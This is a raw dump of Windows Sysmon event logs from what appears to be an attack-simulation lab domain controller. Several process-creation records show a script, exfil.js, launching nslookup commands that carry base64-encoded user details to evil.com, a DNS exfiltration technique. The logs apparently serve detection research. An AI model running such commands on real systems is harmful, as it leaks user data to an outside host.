14:21:26.119{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.119{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.119{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.119{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.119{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-D042-000000005F02}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.119{2E1864BB-18E0-629A-6742-000000005F02}39767944C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-D042-000000005F02}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.120{2E1864BB-18E6-629A-D042-000000005F02}7008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlylax.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.103{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpvjm.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000206852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.103{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D64C7016387F2BDB25E4594B7DBCDCDB,SHA256=0F00D7E9EFE3B10173656E89DD657FCC8EC2B8DDB64516D1465653C522D0C999,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.088{2E1864BB-18E6-629A-CE42-000000005F02}61567336C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-CF42-000000005F02}4936C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.088{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.088{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.088{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.088{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.088{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-CF42-000000005F02}4936C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.088{2E1864BB-18E6-629A-CD42-000000005F02}57247592C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-CF42-000000005F02}4936C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.093{2E1864BB-18E6-629A-CF42-000000005F02}4936C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-CD42-000000005F02}5724C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpvjm.tmp 2>&1 10341000x8000000000000000206843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.072{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-CE42-000000005F02}6156C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.072{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-CE42-000000005F02}6156C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.070{2E1864BB-18E6-629A-CE42-000000005F02}61567336C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-CD42-000000005F02}5724C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.050{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-CE42-000000005F02}6156C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.050{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.050{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.050{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.050{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.050{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-CD42-000000005F02}5724C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.050{2E1864BB-18E0-629A-6742-000000005F02}39765480C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-CD42-000000005F02}5724C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.050{2E1864BB-18E6-629A-CD42-000000005F02}5724C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpvjm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.035{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrirvl.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.003{2E1864BB-18E5-629A-CB42-000000005F02}33847688C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-CC42-000000005F02}5384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.003{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 